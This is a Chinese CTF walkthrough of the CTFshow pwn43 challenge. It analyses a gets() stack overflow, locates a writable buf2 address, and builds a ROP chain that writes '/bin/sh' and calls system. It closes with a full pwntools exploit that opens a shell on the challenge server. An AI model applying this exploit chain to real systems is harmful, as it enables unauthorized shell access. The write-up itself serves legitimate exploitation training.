当前位置：首页 > news >正文

CTFshow-PWN-栈溢出实战：无/bin/sh的system调用构造

news 2026/5/24 7:54:40

1. 理解题目背景与核心挑战

最近在CTFshow的PWN题目中遇到一道有趣的栈溢出题（pwn43），题目给出了system函数的地址，但程序里找不到现成的"/bin/sh"字符串。这种场景在实际CTF比赛中很常见，我们需要通过分析内存布局，找到可写入的缓冲区，然后构造完整的攻击链。

这道题的特殊之处在于，传统的直接调用system("/bin/sh")的方法行不通了。我们需要分两步走：首先找到合适的内存地址写入"/bin/sh"，然后精心构造ROP链让程序执行system函数时能正确找到这个字符串。这涉及到对程序内存布局的深入理解和gets函数特性的灵活运用。

2. 漏洞分析与关键发现

用IDA反编译程序后，发现ctfshow函数里定义了一个104字节的字符数组s，使用gets函数读取输入。gets函数不会检查输入长度，这就给了我们栈溢出的机会。更重要的是，我们发现程序中有system函数的地址（0x8048450），但缺少"/bin/sh"字符串。

通过gdb调试，使用vmmap命令查看内存映射情况，发现0x804b000到0x804c000这段内存是可读写的（rw-p）。在这段内存中找到了一个buf2变量，地址是0x804B060。这个发现很关键，因为它给了我们一个可控的写入位置。

gets函数的地址（0x8048420）也很重要，因为我们需要用它来向buf2写入"/bin/sh"。这样，整个攻击思路就清晰了：先用gets把"/bin/sh"写入buf2，然后调用system函数时把buf2地址作为参数传递。

3. 内存布局与权限分析

理解内存布局是PWN题的关键。通过vmmap命令，我们可以看到内存段的详细权限信息：

rw-p表示可读可写但不可执行
1000和2000表示内存区域大小
/home/ctfshow/...表示内存映射来源

在0x804b000到0x804c000这段可读写内存中，buf2的地址0x804B060正好位于其中。这意味着我们可以安全地向这个地址写入数据，而不会触发内存保护机制。这种分析能力在解决实际PWN题时非常重要。

4. 构造ROP攻击链

现在我们需要构造一个完整的ROP链来实现攻击。具体思路是：

先用栈溢出覆盖返回地址，跳转到gets函数
让gets函数把"/bin/sh"写入buf2
然后返回到system函数，并把buf2地址作为参数

对应的payload结构应该是：

[填充数据][gets地址][system地址][buf2地址][buf2地址]

第一个buf2地址是gets函数的参数（告诉它往哪里写），第二个buf2地址是system函数的参数（告诉它从哪里读取命令）。这种双重参数的设计是这道题的精髓所在。

5. 编写完整exp代码

基于以上分析，我们可以写出完整的攻击代码：

from pwn import * context.log_level = 'debug' p = remote('pwn.challenge.ctf.show', 28227) offset = 0x6C + 4 # 计算填充长度 system_addr = 0x8048450 buf2_addr = 0x804B060 gets_addr = 0x8048420 payload = b'a'*offset + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr) p.sendline(payload) p.sendline("/bin/sh") p.interactive()

这段代码首先计算需要填充的长度，然后构造包含gets和system函数地址的payload。发送payload后，再发送"/bin/sh"字符串让gets函数写入指定位置，最后获取交互式shell。